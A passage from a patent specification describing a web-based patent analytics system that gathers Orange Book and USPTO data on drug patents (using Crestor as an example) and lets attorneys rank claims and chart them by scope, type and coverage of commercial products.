search the database to find all patents related to a drug such as Crestor . The user may further wish to see the expiration dates of all patents related to Crestor against the breadth of their claims. In this manner non technical personnel can quickly see what patents either need to be licensed or designed around in order to bring a generic drug to market. If a business knows it is not planning on launching the new drug for three years a user can look at the chart and quickly determine which patents may safely be ignored. Other combinations of the objective data and subjective criteria are explored more fully below. In some embodiments a data request e.g. a search query is made by the patent analytics system seeking data relating to chemical molecules compounds or other patentable subject matter. As may be more fully illustrated below this data request may take the form of the execution of a Web crawler or other application designed to elicit information from for example Web pages or other sources of data available on the network . In some cases direct queries may be made of a specific drug website e.g. the Orange Book Website . Once a data request is made then drug data may be returned from each of the Websites in response to the query. In some cases the drug data e.g. retrieved data or data may be pulled from the Website by for example a Web crawling application while in other cases it may be pushed by the Website in response to a direct query by the patent analytics system . Similarly the data request may formatted to request patent data from the USPTO website . This patent data may include but is not limited to prosecution history patent claims patent claim revisions and patent reference data e.g. filing date expiration date etc. . Further this drug and patent data may be in the form of for example a Hyper Text Markup Language HTML based web page a Portable Document Format .pdf formatted file or some other suitable file e.g. .tiff .png .gif. etc. . As will be more fully illustrated below upon retrieval this drug and patent data may be parsed based upon claim language limitations and stored for future use. In some example embodiments ranking data is transmitted from the client computer to the patent analytics system . As explained above this ranking data may include data associated with the scope type and category or patent claims stored in the patent analytics system . Further illustrated is a report request that is communicated to the patent analytics system via the network . An example report request may include a request for information stored in the patent analytics system such as ranking data drug data patent data or any combination thereof. In response to a report quest the patent analytics system may retrieve the requested data transform it into a graphic representation and transmit it as report data to the client computer where it may be presented on a display device. In some embodiments Website and associated data stores relating to arts other than the chemical and biological arts may be accessed for the purpose of obtaining information relating to a patent. For example when obtaining information relating to the patent in the electrical or software arts web site Web sites run by organizations such as the Institute of Electrical and Electronics Engineers IEEE or the Association for Computing Machinery ACM may be accessed for the purpose of obtaining extrinsic evidence. The use of Website and data sources related to the chemical and biotechnology arts is merely for illustrative purposes and is not meant to limit the scope of the system and method illustrated herein. One or more client computers may be communicatively coupled to the patent analytics system via a network . The network may include a single LAN or WAN or combinations of LANs or WANs such as the Internet. The various devices coupled to the network may be coupled to the network via one or more wired or wireless connections. One or more public data warehouses and one or more private data warehouses may also be communicatively coupled to the patent analytics system via the network . The Web server may communicate with the file server to publish or serve files stored on the file server . The Web server may also communicate or interface with the application server to enable Web based presentation of patent related information. For example the application server may consist of scripts applications or library files that provide primary or auxiliary functionality to the Web server e.g. multimedia file transfer or dynamic interface functions . In addition the application server may also provide some or an entire interface for the Web server to communicate with one or more of the other servers in the patent analytics system e.g. the messaging server or the database management server . The application server may also contain one or more software programs capable of searching collecting or organizing references from disparate sources. One example of such a program includes a Web crawler also known as a Web spider or robot. Web crawlers include programs that are specifically designed to browse the World Wide Web in an automated methodical manner. Some Web crawlers are programmable such as being able to filter on a particular subject matter area or restrict crawling to a particular group of Web sites. Another example of a software program that may be hosted on the application server for such an operation includes a script or a dedicated program to periodically or regularly search one or more specific Web sites. Such a script or dedicated program may be available from a content provider. For example a content provider may grant licenses to proprietary content for a fee. As a provision of the license the licensee may be given a program such as a client program to access the proprietary content. The client program may be configurable to automatically search or retrieve data from the content provider s data store and save resulting data such as to the patent database . In some embodiments this Web crawler application may have a selection policy geared toward downloading Web pages and the content contained therein relating to pharmaceutical industry drug data. This policy may provide a uniform policy for revisiting certain Web sites displaying pharmaceutical industry drug data where all Web sites are re visited with the same frequency regardless of the rate of content or Web page change taking place on the site. In some embodiments a proportional policy may be invoked where Web sites are re visited based upon the frequency of Web page or content change on a particular Web site. In some embodiments the crawler application itself engages in for example path ascending crawling focused crawling deep Web crawling and or may restrict the number of followed links that it analyzes. Some embodiments may include some other suitable Web crawler application s . Public data warehouses may include an online interface and a data storage mechanism. For example a Web based interface may be provided such that a user may access the public data warehouse to search for patents or publications related to an issued patent. Examples of a public data warehouse include the USPTO Web site www.uspto.gov the Food and Drug Administration s FDA Web site www.fda.gov and the World Intellectual Property Organization WIPO Web site www.wipo.int . Private data warehouses may include online or offline data stores. Online data stores may be configured similar to public data warehouses such as by providing an interface e.g. a Web browser interface to a data source e.g. a database . Examples of private data warehouses include Thompson WESTLAW www.westlaw.com and LEXISNEXIS www.lexis.com . Typically private data warehouses include a membership or subscription to browse view or search data. Other private data warehouses may use a pay per use fee structure. The patent database may include data such as published patent applications issued patents publications objective and subjective patent data and the like. The patent database may be implemented as a relational database a centralized database a distributed database an object oriented database a flat database or other database type depending on the specific embodiment. In some embodiments the patent database includes one or more databases e.g. a patent database a publications database a user database a search terms database a claim limitations database a ranking database such that the combination of the one or more databases may be referred to as a patent database. During operation in one embodiment patent reference information is collected and stored in the patent database . A user not shown may access the patent analytics system such as by using a client computer over the network . The user may select a patent application or publication of interest and review one or more references related to the patent application or publication. In some embodiments summary reports or other information may be sent to the user for example at the user s request or periodically via the messaging server . The user may further submit subjective patent data e.g. claim breadth and objective patent data e.g. type of a patent claim to the patent analytics system . The patent analytics system may then store the received subjective and objective patent data in the patent database such that it is associated with the patent reference information. Messages distributed by the messaging server may include one or more of e mail voice text messaging or other communication protocols or mediums. Further capabilities of the patent analytics system are illustrated herein. Patents in the United States are granted to inventors of new processes devices manufacturable objects and compositions. An issued patent gives the inventor the right to exclude others from practicing what is claimed in the issued claims of the patent for a period of time in exchange for disclosure of information related to the invention such as the best mode known of practicing the invention and sufficient description in the specification portion of the patent for someone skilled in the area of the patent to practice what the patent claims. The claims of a patent are therefore used to define the scope of what the patent covers and the remainder of the patent supports or explains what is covered in the claims. Obtaining a United States patent involves filing a patent application with the Patent and Trademark Office PTO which is a government entity within the Department of Commerce. The patent application is examined for proper form for novelty and for other purposes. The process of examination is also referred to as patent prosecution. Patent prosecution may include one or more official PTO correspondences between the PTO and the inventor or the inventor s representative. Such correspondence may include assertions regarding suspected problems with the patent application by a PTO Examiner as well as responses which may include arguments or amendments by inventors or their representatives. Information exchanged during this patent prosecution process is often useful in determining the scope of a patent because amendments arguments or disclosures made during prosecution may limit the scope or validity of patent claims under some patent laws. In certain situations such as during litigation or re examination evidence may be used to interpret or limit the claims. During prosecution a record is created. This prosecution record including the patent itself is considered intrinsic evidence. In addition to intrinsic evidence some extrinsic evidence may be referenced. Extrinsic evidence such as dictionary definitions of terms and published papers or articles may also be used to interpret or define terms or phrases used in claims. Gathering and evaluating intrinsic and extrinsic evidence is time consuming and burdensome. Typically to determine relevant intrinsic evidence the patent prosecution record and references used during prosecution may be obtained and carefully evaluated by legal personnel. Additionally to obtain extrinsic evidence publications e.g. papers books dictionaries technical manuals etc. or experts may be consulted. The process of gathering and organizing intrinsic and extrinsic evidence related to a patent application s prosecution is expensive and time consuming. Various factors including the volume of information that must be considered and the expertise and training required to provide a thorough legal analysis contribute to this burden. At a patent of interest is identified. Using the patent a drug name of interest is identified through the implementation of operation . For example if a user is attempting to evaluate the validity or position of infringement of a pharmaceutical patent the drug name may include the primary operation of the patent. Using the drug name a regulatory database e.g. the Orange Book may be searched and information retrieved via the implementation of an operation to produce related patents. Related patents may include patents in a patent family e.g. parents or descendents based on continuation divisional or other related applications . In addition periods of exclusivity may also be collected. The related patents provide additional search criteria for further searching of other data sources such as the ANDA filings or other technical information databases. At an operation is illustrated such that the related patent numbers are used to search and information retrieved from these sources for additional drug filings drug formulation or ingredient information. The combined collection of search results e.g. retrieved information from block and block is filtered or scrubbed at such as to remove irrelevant information with regard to one or more claim limitations included in the identified patent from block . Filtering may include actions such as removing duplicate search terms consolidating search terms determining synonyms of search terms comparing search terms to terms found in the patent of interest or its claims or other steps to pare down terms to a core of relevant search terms. The relevant search terms may then be used in one or more progressive searches such as to search the USPTO see e.g. operation for additional U.S. patents or patent applications not found in the Orange Book search international patent databases see e.g. operation for relevant non U.S. patents or patent applications or search information databases e.g. technical database or the World Wide Web for relevant non patent literature see e.g. operation . The relevant patents obtained from searches of domestic or international databases may be further processed by extracting relevant claims via the implementation of operation . Relevant claims may include claims that recite the composition or formulation of an active ingredient including those that include a drug carrier methods of manufacturing the active ingredient in the drug methods of manufacturing the active ingredient in the drug methods of using the active ingredient e.g. methods of treatment or specific formulations of the active ingredient e.g. formulations including a salt solvate polymorph or metabolite of the active ingredient or a pro drug of the active ingredient . The augmented collection of information from the various sources may be stored in the patent analytics system such as in the patent database . Once the relevant claims are extracted an operation is carried out that assembles retrieved information into a file data stream or the like. Further the operation may assemble the retrieved information and extracted relevant claims and to place this information and extracted claims into some type of file e.g. an XML based file for future use or display. As reflected in the implementation of operation portions of the U.S. patents and applications non U.S. patents and applications and non patent literature may be presented to a user in one or more forms as illustrated herein including clean claims marked up claims and various versions of claim charts. In addition to the navigation links the directory screen includes a search input control . The search input control may be implemented as an HTML form control in some embodiments. The user may provide one or more search strings and activate the submit control to initiate the search. In some embodiments the search s domain includes the annual edition of the Orange Book any cumulative supplements to the Orange Book and a patent reference database e.g. in . When a user submits a search one or more fields may be automatically searched such as active pharmaceutical ingredient e.g. chemical name proprietary name e.g. trademarked name molecular formula names of any commercially marketed formulations having the specified active ingredient indication of use sales of drug e.g. USD per year type of formulation e.g. gel lotion ointment route of administration e.g. topical oral IV IP rectal buccal patent holder e.g. assignee licensee marketing company NDA ANDA Holder application number FDA patent number claim terms patent expiration date or FDA period of exclusivity. In some embodiments a user may be provided one or more controls such as HTML form controls to select or choose which of the one or more fields to search. Finally an example run report control is displayed on the directory screen . By activating the run report control a user may generate a formatted report such as illustrated in more detail below using one or more search terms provided in the search input control . In some embodiments when a search is detected to possibly return a large number of results the user may be notified of such a condition and be provided a control to terminate the search. illustrates an example of a search in progress screen . The search in progress screen may be programmatically set to appear when a threshold number of results are determined to exist. For example when over 1 000 results are found a user may be presented with the search in progress screen where the user may terminate the search or allow it to continue. In the example shown in response to an interrupted search a user may activate a continue control a stop and view control or a terminate search control . If the user activates the continue control the search may continue to its normal completion possibly returning a large number of search results. If the user activates the stop and view control the search may immediately cease operation and the user may be presented with the results found at the point when the search was ceased. If the user activates the terminate search control the search may be canceled and in one example the user may be provided a search input control to provide additional search terms for a successive search. After performing one or more searches a user may determine a particular drug of interest. illustrates an example of a report generation screen . In some embodiments using the run report control in the user may navigate to the report generation screen . The user may enter a particular drug name in the search input control in . The system can then use the provided drug name to perform a background search of the patent database . The user is then presented with the report generation screen and can check one or more detail checkboxes to indicate what information to include in the report. After selecting the desired output options the user can activate the submit control to initiate the report generation. Report output may be in a tabular list or other format. The output may include links to documents e.g. .pdf documents spreadsheet documents or plain text. In some embodiments .pdf documents are in a searchable text format. In some embodiments when information is incomplete regarding a particular detail the detail checkbox and description may be presented differently to indicate to the user that the option is not available in the report. For example in the dosages detail control is disabled and indicated as such using italic font. In other examples other font effects or user interface indications such as a grayed out font or control may be used. In some embodiments the system and method illustrated herein may provide a user with multiple ways to search a dynamically linked database of patent reference information provide intelligent filtering categorization and organization of patent information from disparate sources and provide a powerful and flexible reporting feature. In the examples and embodiments illustrated above the references whether associated with a claim limitation manually automatically or by some combination thereof may all be useful in a variety of applications. Certain processes may be largely automatic such as where data related to a pharmaceutical name is automatically collected by a program or other automated agent. Other processes may include manual processes such as search techniques used to find relevant business method patents which are typically more abstract and may use less standardized language. The evidence regarding the meaning and scope of claim limitations is useful to patent attorneys and others for a multitude of purposes including determination of the scope or extent of a patent which may be used to determine patent validity questions of infringement or patent value. These determinations are examples of what are often investigated when patent attorneys draft opinions or opinion letters. For example a person marketing an invention may wish to have the validity of another inventor s patent covering the new product investigated in hopes that the patent may be found to be invalid for some reason. As another example a patent owner assessing whether to assert a patent against a potential infringer may wish to confirm the validity of the patent before contacting the potential infringer regarding licensing fees or possible litigation. Formal opinions regarding patent infringement can be particularly valuable as a party having an opinion issued in good faith indicating a particular method article or composition does not infringe another s patent is generally shielded from triple or treble damages for willful infringement should the party later be found to infringe the other s patent. Similarly the party wishing to assert a patent may often investigate not only the validity of their own patent before asserting it but may also obtain an infringement opinion to determine whether the suspected infringing product in question is in fact infringing on the patent to be asserted. In various embodiments extraction and organization of claim limitations and related intrinsic and extrinsic evidence may provide one or more advantages to users e.g. patent attorneys such as assisting in determination of the scope or extent of a patent to evaluate validity infringement or patent value. Such evaluations may be useful when forming legal opinion considering lawsuits or assessing licensing opportunities. In some embodiments a method is illustrated as including receiving a search query see e.g. operation the search query relating to a patent retrieving see e.g. operations data relating to a term contained in a claim limitation in the patent the data including at least one of intrinsic or extrinsic evidence associated with the term by a hyperlink and displaying the claim limitation and the hyperlink see e.g. operation . In some embodiments the hyperlink includes a mechanism to present a popup menu containing a plurality of references defining the term contained in the claim limitation. Additionally the popup menu may display the intrinsic evidence. A further hyperlink to an electronic document containing the intrinsic evidence may also be displayed. The popup menu may also display extrinsic evidence. Also a further hyperlink to an electronic document containing the extrinsic evidence may also be displayed. The hyperlink may include a mechanism to present a first popup menu containing the intrinsic evidence and a second popup menu containing the extrinsic evidence. Moreover the intrinsic evidence may include at least one of a specification of the patent in which the claim limitation appears another claim of the patent or a prosecution history of the patent. The extrinsic evidence may include at least one of a publication another patent expert testimony testimony of an inventor on the patent or a dictionary definition. As discussed above once the underlying reference patent data e.g. the objective patent data has been gathered for relevant drugs and patents subjective criteria may be applied to the resulting patent claims. In an example embodiment this process is implemented without the use of an artificial intelligence algorithm but rather more closely resembles attorney work product. Companies may wish to rank and rate patents and their underlying claims by a myriad of criteria. In an example embodiment a user interface is presented to a user of the system to categorize one or more patent claims in the database by one or more subjective criteria. The criteria may include if a claim covers a commercial product whether or not a claim is listable in orange book claim scope claim type and claim category. In an example embodiment only the independent claims of a patent are presented to a user for categorization. Three example user activity controls and are illustrated in . User activity control may allow the user to submit the ranking data entered in user interface to the patent analytics system . The ranking data may be formatted to allow easy parsing and storing by the patent analytics system . For example the data may be formatted according to a defined XML schema. The next claim user activity control may also transmit the ranking data to the patent analytics system while also presenting the next claim in the patent. Cancel user activity control allows a user to not have the ranking data transmitted to the patent analytics system . In an example embodiment a determination is made as to whether or not a patent claim covers a commercial product . This determination may be aided by examining data in the Orange Book if available. In some example embodiments a user may indicate the drug or drugs or other commercial product that a patent claim may cover. In further example embodiments the patent database may store numerical representation of yes or no determinations as 1 and 0. In some example embodiments an option may be presented to indicate that a user is unsure as to whether or not a patent claim covers a particular commercial product. These claims may then be reviewed en masse by more knowledgeable personnel at a later time to make a final determination as to the applicability of a claim to a particular commercial product. As discussed above a covered drug may or may not be listable in the Orange Book. In an example embodiment users of the system are given a choice of yes or no in relationship to whether a particular claim is listable in the Orange Book. In some example embodiments the reason why a user of the system believes a patent claim is or is not listable is stored along with a determination of yes or no in a database. In further example embodiments the system may use numerical values to represent a user s categorization of each patent claim. For example the system may store a yes as 1 and no as 0. Claim scope may be determined to be broad intermediate or narrow. An advantage of utilizing fewer categories may be that a patent attorney can quickly rank many patent claims. In further example embodiments more categories may used to detail a claim s scope with more specificity. For example a rating scale of one to ten may be used in place of the qualitative descriptions with one being broad and ten being narrow. This added granularity may allow a company to allocate resources more efficiently in determining whether or not a patent may easily be designed around licensed etc. In some example embodiments the reasoning for each ranking rating may be stored with the patent claim. As described above patent types may include compound method of use polymorph hydrate and method of medical use. Other possible type categories may include composition claims processing claims and product by process claims. In some example embodiments a user of the system may have the ability to define additional patent claim types if the predefined types do not accurately describe the patent claim. In making the determination of what type each patent claim belongs to the user may indicate a particular reason for the categorization as to allow non legal and non technical personnel to better understand a particular patent claim. Pharmaceutical companies may wish to determine a category for each patent claim. These categories may include but are not limited to core ancillary and evergreen. The core category may include patent claims that relate to a genus of compounds without any other limitations in which the referenced compound API falls. The core category may also include a specific compound designated by name or structure without any other limitations that corresponds to the referenced compound API . In an example embodiment claims categorized as core may include a pharmaceutical composition that broadly includes a carrier excipient and the core compound without any other limitations. The core may further include a method of medical treatment that includes administering the core compound to treat a broad or narrow class of diseases or disorders without any other limitations. In some example embodiments basic methods of manufacturing the referenced core compound without any other limitations may also be categorized as core patent claims. In an example embodiment patent claims categorized as ancillary are considered follow up patent claims. For example a pharmaceutical composition that more narrowly includes a carrier excipient and the core compound may be an ancillary patent claims. In an example embodiment a method of medical treatment that more narrowly includes administering the core compound to treat a broad or narrow class of diseases or disorders may be categorized as ancillary. Also ancillary patent claims may include specific methods of manufacturing the referenced core compound. In an example embodiment patent claims categorized as life cycle management LCM or evergreen patents may cover one or more of the following categories. In an example embodiment an LCM patent may cover compounds limited to specific stereoisomers enantiomers diastereomers enantiomeric excess EE etc. . Further example embodiments may include compounds limited to specific polymorphs and compounds limited to specific hydrates solvates or salts. An example embodiment of a LCM patent may include compounds API carrier polymer adjuvant etc. limited to specific purity levels. Compositions limited to picture claims of the commercial formulation may be considered an LCM patent. Further example embodiments may include compounds API limited to crystalline forms business method claims e.g. a method of ensuring patient compliance by including specific labeling specific narrow processing synthetic methods API and key intermediates novel key synthetic intermediates and dosing regimens. In an example embodiment LMC patents include subsequent methods of medical use treatment in vivo in vitro screening etc. that are narrower slices compared to original claimed use and specific methods of medical use treatment that are narrower slices compared to original claimed use FDA label uses off label uses etc. Further example embodiments may include mechanistic types of method claims e.g. inhibiting receptor Y by admin. compound X and combination therapy treatment with additional APIs style claims. In an example embodiment claims covering combination therapy treatment with additional APIs and derivatives metabolites and pro drugs are also considered LCM patent claims. Further example embodiments may include controlled release immediate release and extended release formulations and combination therapy treatment with additional APIs. In order to facilitate the analytics component various user interfaces may be presented to a user of the system. For example a user interface such as illustrated in may be presented. Shown are text fields related to patent number drug and API. Also shown are options to display a patent centric drug product centric or API centric result view. A user may search the database using by submitting a search query by filling in one of the available fields and clicking search. The system may return search results in a table form associated with a user s selected preference. As illustrated in the system may query the database for criteria matching the search query and present one or more patents. In some example embodiments not all of the patents returned will have associated proprietary names. shows example results in a proprietary centric view. illustrates example results in a patent number centric view. Not shown in are user interface controls such as checkboxes that may be presented next to each patent number in the search results. A user may select one or more of the search results to rank by clicking on the checkboxes. As one skilled in the art will appreciate there may be other ways for a user to indicate a preference to categorize the patents such as presenting radio buttons etc. A user may then activate a control indicating the user wishes to rank the selected patents. The system may then present the user with an interface such as to facilitate the ranking process. In further example embodiments all of the claims for a patent are presented. The user may select one or more of the presented patents claims to rank at the same time. After the user indicates how the claims should be ranked and rated the user may submit the user s responses to the system. The system may then store the ranking and rating data in a database. In an example embodiment the ranking data is stored such that it is associated with the patent claims already stored in the patent database. This may allow the patent analytics system to retrieve all relevant data for a patent in one location in the patent database. Upon a user ranking one or more patents using subjective and objective criteria the user or other users may search and filter the resulting information. For example a search interface may be presented that includes the five categories described above. Further example embodiments include options to search using the subjective data as well as the objective data expiration date etc. . In an example embodiment a user may generate reports utilizing the subjective and objective data stored in the patent databases. The objective data may include but is not limited to US sales patent term expirations FDA exclusivity expirations US patents listed in Orange Book for particular drug drugs with orphan status drugs with same FDA approved indication FDA label drugs acting via same biological mechanism of action drugs with same therapeutic category Merck Index drugs with same product category sub category PDR drugs with same API and drugs administered via same route of administration. The subjective data may include but is not limited to whether a claim covers a commercial product claim scope claim type claim category and if the claim is listable in Orange Book. It is appreciated that some of the subjective data e.g. claim type may appear to be an inherently objective determination. However user input is still required to make the final determination. This is contrast to the objective data that is generally pulled from websites in an automated process. A report generation user interface as illustrated in may be presented on a display device to a user to facilitate the process of generating a report request . Illustrated are a number of patents that a user may select to include in the report request a plurality of parameters field indications of where to chart the parameters a selected claim type parameter a reads on commercial product parameter and a generate report control . The patents illustrated may be presented in response to a search query. This may be done by the user submitting a search query to the system which may include one or more of the subjective and objective indicia already stored in the database. For example the user may submit a search query that indicates the user wishes to examine all patents that relate to Crestor . The system may generate an SQL expression that matches the user s search query to retrieve all patents that relate to Crestor e.g. by API . The results may be presented to the user with checkboxes next to each patent in the search results allowing the user to select or unselect each patent. The user may further limit the number of patents retrieved by filtering the results. For example the user may indicate only patents still in force should be included in the report or the user may wish to only see patents filed by a certain entity. In some example embodiments the results of the searching and filtering process may be saved in the system as a patent set. This may allow other users to generate additional reports based on the same patents without the need to generate an additional search query. In some example embodiments when a user indicates a report should be generated from a saved patent set the system prompts the user to choose whether or not the underlying search query should be submitted again as to include newly added patents. The user may then select all or a sub set of the presented patents. Illustrated is the selection of patents 1 2 4 and 7. Other search queries may be formatted with respect to the intrinsic extrinsic subjective and objective data described herein. All or a sub set of the stored parameters including objective and subjective data fields may be shown to a user. The user may select a field for the x axis of a graph and a field for the y category. Various combinations of the fields allow users to create charts in relation to infringement and freedom to operate opinions as well as any other analysis needed. illustrates the selection of the claim type parameter as the x axis of the report and read on commercial product parameter as the y axis of the report. In an example embodiment the generate report control submits the report request to the patent analytics system. In some example embodiments error checking is completed before the report request is submitted to the patent analytics system. For example some combinations of parameters may not be allowed such as the selection of more than one parameter for the x axis. An error message may be presented to the user on the display device notifying the user to correct the problem. Further diagnostic messages included within the report data may be presented to the user if action is required by the user. For example if the patent claims selected do not have any claim rankings the system may present a message to the user requesting the selection of a different parameter. In some example embodiments the message includes an option to rank the patents with respect to the missing data. In an example embodiment upon receiving the report data a chart may be generated and presented to the user. In some example embodiments a chart is generated on the patent analytics system and transmitted to a client computer. For example illustrates a graph showing whether or not a claim covers a product on the x axis and claim breadth on the y axis. As illustrated the upper right quadrant represents the intersection of broad claims that also cover the drug product and the lower right quadrant illustrates those claims that are narrow and cover the drug product. In contrast the left two quadrants represent claims that do not cover the drug product with the upper left covering broad claims and the lower left covering narrow claims. Each patent may include one or more claims in the report and therefore each patent may be included in report more than once. illustrates that after each patent number a claim number is shown to indicate which claims of the patent are relevant for that particular data point. For example at the intersection of Compound and Yes U.S. Pat. No. 4 681 893 is listed along with 1 to signify that this particular categorization only applies to claim 1 of U.S. Pat. No. 4 681 893. As illustrated U.S. Pat. No. 4 681 893 is listed twice more for claims 8 and 9. If the number of claims is too great to illustrate on the graph directly a notation may be made next to the patent number. For instance U.S. Pat. No. 5 969 156 includes a notation that directs the user to the bottom portion of the report to see which claims are included for that particular data point. Each claim in the patent set may be given a symbol or color that is used each time the patent is presented in the report. For example U.S. Pat. No. 5 273 995 has been assigned the square shape. In an example embodiment colors may be used to further distinguish the different patents. The report may include an interactive portion that allows a user to interact with the data points presented on the report. For example a user may hover use an input device such as a mouse and place the cursor over a point on the report over the different claim types to see the definition of the claim type. Further in an example embodiment a user may hover over each data point to see the reason why a claim was categorized in a particular way. If more information is needed a user may click on the data point and be presented with detailed information concerning the patent claim including all the subjective and objective indicia that are associated with the claim and its parent patent. In a further example embodiment when a user hovers over a data point for a particular patent other patents are dimmed to provide the user with a clear picture of all the claims in the patent currently being hovered over. Some example embodiments may include the above illustrated methods being implemented as software modules or operations. Common too many of these components e.g. operations is the ability to generate use and manipulate the above illustrated data and data sets. These operations and associated functionality may be used by the client server or peer applications. These various operations can be implemented into the system on an as needed basis. These operations may be written in an object oriented computer language such that a operation oriented or object oriented programming technique can be implemented using a Visual Operation Library VCL Operation Library for Cross Platform CLX Java Beans JB Java Enterprise Beans EJB Operation Object Model COM or Distributed Operation Object Model DCOM or other suitable technique. These operations are linked to other operations via various Application Programming Interfaces APIs and then compiled into one complete server and or client application. The process for using operations in the building of client and server applications is well known in the art. Further these operations and the tiers that they make up are linked together via various distributed programming protocols as distributed computing components. Some embodiments may include storage operations e.g. patent database that facilitate the storage of data wherein tables of data are created and data is inserted into and or selected from these tables using Structured Query Language SQL Multidimensional Expressions MDX language or some other database related language known in the art. These tables of data can be managed using a database application such as for example MYSQL SQLSERVER Oracle 8I 10G MICROSOFT ANALYSIS SERVICES or some other suitable database application. These tables may be organized into a Relational Data Schema RDS Object Relational Database Schemas ORDS a Multidimensional Cube used in On Line Analytical Processing OLAP or some suitable architecture. These schemas may be normalized using certain normalization algorithms so as to avoid abnormalities such as non additive joins and other problems. Additionally these normalization algorithms include Boyce Codd Normal Form BCNF or some other normalization or optimization algorithm known in the art. In some embodiments these tables are data files to be manipulated and managed by for example the above referenced applications. The patent application file may be structured to store one or more details related to one or more pending published patent applications. For example the patent application file may include one or more fields such as a title field a publication date field an application date field an application serial number field an assignee identification field a U.S. classification field an international classification field an inventor identification field or a foreign priority field. The issued patent file may be structured to store one or more details related to one or more issued patents. For example the issued patent file may include one or more fields such as a title field a publication date field an issued date field an application date field an application serial number field an assignee identification field a U.S. classification field an international classification field an inventor identification field a primary examiner identification field a secondary examiner identification field a PCT information field an attorney or agent field or a foreign priority field. The intrinsic reference file may be structured to store one or more details related to intrinsic references. In some embodiments the intrinsic reference file includes one or more database tables which may be linked such as with a primary foreign key relationship in a relational database scheme to one or more tables in the patent application file or to one or more tables in the issued patent file . One or more tables may be included in the intrinsic reference file to store one or more references cited during prosecution one or more office actions or office action responses one or more affidavits filed by the applicant or examiner one or more records or telephonic or in person examiner interviews or other paper filed by the applicant or examiner. The office action file may be structured to store one or more details related to one or more office actions related to a particular patent application or issued patent. The office action file may include one or more fields such as a type of office action field a primary examiner identification field a secondary examiner identification field a mailed date field a patent application reference field e.g. an application serial number or an attorney docket number or links to previous or subsequent office actions in a chain of office actions related to a particular patent application or issued patent. The PTO correspondence file may be structured to store one or more details related to miscellaneous PTO correspondence related to a particular patent application or issued patent. For example correspondence related to issuance notification maintenance fees status information interferences or other papers submitted to or received from the PTO. The claims file may include structure to store one or more details related to claims of a particular patent application or issued patent. The claims file may include one or more fields such as type of claim e.g. method apparatus parent child relationships among two or more claims claim limitations or claim preamble. The claims file may be associated with one or more of the patent application file issued patent file intrinsic references file or the office action file in various embodiments. For example claims presented in a particular office action response may be stored in the claims file . As another example claims or portions thereof may be stored and associated with a particular intrinsic reference e.g. cited patent . In addition the claims file may be associated with one or more of the abstract file the detailed description file the background file or the figures file . For example a particular claim limitation may be related associated with a figure or portion of a figure as stored in the figures file where support for the particular claim limitation may be found. The abstract file may include structure to store one or more details related to an abstract section of a patent application or issued patent. Likewise the detailed description file and the background file may include one or more fields to store the content of the respective section of a patent application or issued patent. For example text tables in line figures mathematical formulae chemical diagrams schematic diagrams or other portions of the background or detailed description of a particular patent may be stored either separately or combined in the detailed description file and or the background file . The figures file may include structure to store one or more details related to one or more figures of a patent application or issued patent. For example the figures file may store images e.g. .tiff .png .pdf or some other suitably formatted image file of one or more figures. As another example the figures file may include text illustrating a particular figure. As another example the figures file may include a standardized description of one or more figures for example using an XML file format for drawings such as .vdx VISIO files as provided by Microsoft Inc. The extrinsic reference file may include structure to store one or more details related to one or more extrinsic references related to a patent application or issued patent such as one stored in patent application file or issued patent file . The extrinsic reference file may include one or more fields such as a title a date of publication a cite a cited portion e.g. the text corresponding to the cite an author a publication source or the like. Because extrinsic references may be cited by more than one patent application or issued patent the extrinsic reference file may be related associated with the patent application file and or the issued patent file in various embodiments. The ranking file may include structure to store one or more details related to one or more patent claims related to ranking data. The ranking file may include one or more fields such as a patent claim identification a ranking category a ranking for the ranking category a reason for the ranking and other information that may submitted to the system that is associated with patent ranking data. In embodiments one or more database files may be structured as one or more tables in a relational database. For example the patent application file may be structured to include an assignee table and an inventor table which may include details about the assignee or inventor such as name address citizenship or the like. The assignee table and or the inventor table may be linked using a primary foreign key relationship with a patent application table to create a normalized database structure. The assignee table and or the inventor table may further be linked to other tables such as an issued patent table in the issued patent file or an intrinsic reference table in the intrinsic reference file . The database files illustrated above are for illustrative purposes only. In various embodiments other fields may be used or some fields may not be included depending on the use and structure needed for the database. In further example embodiments the receiver receives a first parameter and a second parameter the first and second parameters indicative of a first and second characteristic of a patent claim respectively. The retriever may access first and second parameter values for at least at least a portion of the patent claims in a set of patent claims the first and second parameter values corresponding to the first and second parameters respectively. The display device may present a chart the chart depicting relationships between the first parameter and the second parameter for at least a portion of the set of patent claims the relationships represented as one or more data points. Some example embodiments may include the previously illustrated components e.g. operations being implements across a distributed programming environment. For example operations providing logic functionality may reside on a first computer system that is remotely located from a second computer system containing an Interface or Storage functionality. These first and second computer systems can be configured in a server client peer to peer or some other configuration. These various levels can be written using the above illustrated operation design principles and can be written in the same programming language or a different programming language. Various protocols are implemented to enable these various levels and operations contained therein to communicate regardless of the programming language used to write these operations. For example a module written in C using the Common Object Request Broker Architecture CORBA or Simple Object Access Protocol SOAP can communicate with another remote module written in Java. These protocols include SOAP CORBA or some other suitable protocol. These protocols are well known in the art. In some embodiments the above illustrated operations that make up the platform architecture communicate using the Open Systems Interconnection Basic Reference Model OSI or the Transmission Control Protocol Internet Protocol TCP IP protocol stack models for defining network protocols that facilitate the transmission of data. Applying these models a system of data transmission between a server and client computer system can be illustrated as a series of roughly five layers comprising as a physical layer data link layer network layer transport layer and application layer. Some example embodiments may include the various levels e.g. the Interface Logic and storage levels residing on the application layer of the TCP IP protocol stack. The present application may utilize HTTP to transmit content between the server and client applications whereas in other embodiments another protocol known in the art is used. Content from an application residing at the application layer is loaded into the data load field of a TCP segment residing at the transport layer. This TCP segment also contains port information for a recipient application or a module residing remotely. This TCP segment is loaded into the data field of an IP datagram residing at the network layer. Next this IP datagram is loaded into a frame residing at the data link layer. This frame is then encoded at the physical layer and the content transmitted over a network such as the Internet Local Area Network LAN or Wide Area Network WAN . The term Internet refers to a network of networks. Such networks may use a variety of protocols for exchange of information such as TCP IP etc. and may be used within a variety of topologies or structures. This network may include a Carrier Sensing Multiple Access Network CSMA such as an Ethernet based network. This network may include a Code Division Multiple Access CDMA network or some other suitable network. The example computer system includes a processor e.g. a Central Processing Unit CPU a Graphics Processing Unit GPU or both a main memory and a static memory which communicate with each other via a bus . The computer system may further include a video display unit e.g. a Liquid Crystal Display LCD or a Cathode Ray Tube CRT . The computer system also includes an alphanumeric input device e.g. a keyboard a User Interface UI cursor controller e.g. a mouse a disk drive unit a signal generation device e.g. a speaker and a network interface device e.g. a transmitter . The disk drive unit includes a machine readable medium on which is stored one or more sets of instructions and data structures e.g. software embodying or used by any one or more of the methodologies or functions illustrated herein. The software may also reside completely or at least partially within the main memory and or within the processor during execution thereof by the computer system the main memory and the 